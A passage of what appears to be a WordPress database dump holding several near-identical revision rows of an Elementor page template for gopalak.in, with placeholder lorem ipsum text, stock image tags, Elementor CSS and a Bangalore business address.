href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:20:45','2022-09-30 05:50:45','',1373,'https://gopalak.in/?p=1427',0,'revision','',0),(1428,1,'2022-09-30 11:21:17','2022-09-30 05:51:17','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:21:17','2022-09-30 05:51:17','',1373,'https://gopalak.in/?p=1428',0,'revision','',0),(1429,1,'2022-09-30 11:21:17','2022-09-30 05:51:17','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:21:17','2022-09-30 05:51:17','',1373,'https://gopalak.in/?p=1429',0,'revision','',0),(1430,1,'2022-09-30 11:21:17','2022-09-30 05:51:17','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, 